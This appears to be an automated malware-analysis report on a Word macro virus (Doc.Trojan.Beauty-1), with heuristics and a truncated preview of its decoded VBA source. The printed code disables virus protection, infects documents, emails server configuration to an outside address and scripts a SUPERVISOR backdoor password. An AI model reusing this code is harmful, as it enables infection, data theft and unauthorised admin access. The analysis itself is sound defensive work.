MALICIOUS
180
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a legacy Word document containing VBA macros, including AutoOpen and AutoClose, which are commonly used to execute malicious code. The 'Storm' subroutine within the VBA code appears to be responsible for the malicious execution, potentially logging activity to 'C:\Storm.log'. The presence of these auto-executing macros strongly suggests an intent to download and execute a secondary payload, characteristic of a macro-based malware dropper.
Heuristics 5
-
ClamAV: Doc.Trojan.Beauty-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Beauty-1
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 28225 bytes |
SHA-256: 13d0e732a54ee439b8d2cb0799afde55723f0c7af35f4ea75c9c0cb1be7cb292 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "StormBringer"
' By StormBringer
' March, 2000
Dim Servidor As String
Dim CxPostal As String
Dim FullName As String
Dim DocName As String
Dim CriouScript As String
Dim AlterouNCF As String
Dim RemoviHate As String
Sub ArquivoSalvar()
On Error Resume Next
Application.EnableCancelKey = wdCancelDisabled
Storm
ActiveDocument.Save
End Sub
Sub AutoExec()
On Error Resume Next
Application.EnableCancelKey = wdCancelDisabled
Options.VirusProtection = False
Storm
End Sub
Sub AutoOpen()
On Error Resume Next
Options.VirusProtection = False
Application.EnableCancelKey = wdCancelDisabled
Storm
End Sub
Sub AutoNew()
On Error Resume Next
Options.VirusProtection = False
Application.EnableCancelKey = wdCancelDisabled
Storm
End Sub
Sub AutoClose()
On Error Resume Next
Application.EnableCancelKey = wdCancelDisabled
Storm
End Sub
Function Storm()
On Error GoTo Sair
Application.EnableCancelKey = wdCancelDisabled
Application.DisplayAlerts = wdAlertsNone
Inicia_Variaveis
Infecta
If (Day(Now()) = 16) Then Gravar
Open "C:\Storm.log" For Append As #1
If DocName = "" Then GoTo Sair
Print #1, ""
Print #1, "Registro de " & Format(Time, "hh:mm:ss AMPM - ") & Format(Date, "dddd, d mmm yyyy")
Print #1, " " & DocName
Print #1, " " & RemoviHate
For I = 1 To ActiveDocument.VBProject.VBComponents.Count
Print #1, " - " & ActiveDocument.VBProject.VBComponents(I).Name
Next
Close #1
Sair:
Close #1
End Function
Sub Inicia_Variaveis()
On Error GoTo Sair
Servidor = System.PrivateProfileString("MBMail.ini", "MHS", "MasterVolume")
CxPostal = System.PrivateProfileString("MBMail.ini", "MHS", "MailBox")
FullName = System.PrivateProfileString("MBMail.ini", "MHS", "FullName")
DocName = Application.ActiveDocument.Name
Sair:
End Sub
Sub Gravar()
Dim Fileorg As String
Dim FileDest As String
On Error GoTo Sair
Cria_Script
Altera_NCF
Saida = Servidor & "MHS\MAIL\SND\BABACAS1"
FileDest = Servidor & "MHS\MAIL\PARCEL\queroa5t"
Fileorg = Servidor & "ETC\NETINFO.CFG"
FileCopy Fileorg, FileDest
Open Saida For Output As #1
Print #1, "SMF-71"
Print #1, "From: " & CxPostal
Print #1, "To: StormBringer23@hotmail.com"
Print #1, "Subject: Pronto de informação"
Print #1, "Attachment-name: NetInfo.cfg"
Print #1, "Attachment-encoding: IBM-437"
Print #1, "Attachment: queroa5t"
Print #1, ""
Print #1, "Registro de " & Format(Time, "hh:mm:ss AMPM - ") & Format(Date, "dddd, d mmm yyyy")
Print #1, "WordName : " & Application.UserName
Print #1, "Documento: " & DocName
Print #1, "Servidor : " & Servidor
Print #1, "Nome NGM : " & FullName
Print #1, "Caixa Postal: " & CxPostal
Print #1, CriouScript
Print #1, AlterouNCF
Close #1
Sair:
End Sub
Sub Cria_Script()
On Error GoTo Sair
CriouScript = "Não criou script"
Saida = Servidor & "NETBASIC\UTIL\STORM.BAS"
Open Saida For Output As #1
Print #1, "#include " & Chr(34) & "net.h" & Chr(34)
Print #1, "#include " & Chr(34) & "fio.h" & Chr(34)
Print #1, ""
Print #1, "SUB CRIA"
Print #1, " BINDOBJ = NET:BINDERY:GET"
Print #1, " BINDOBJ.Type = NET_USER"
Print #1, " BINDOBJ.Name = " & Chr(34) & "SUPERVISOR" & Chr(34)
Print #1, " BINDOBJ.Password = " & Chr(34) & "SUPERVISOR" & Chr(34)
Print #1, " BINDOBJ = NET:BINDERY:SET(BINDOBJ)"
Print #1, " RETURN"
Print #1, "END SUB"
Print #1, ""
Print #1, "SUB IGUALA"
Print #1, " PROP = " & Chr(34) & "SECURITY_EQUALS" & Chr(34)
Print #1, " BIN1 = NET:BINDERY:GET(" & Chr(34) & "SUPERVISOR
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.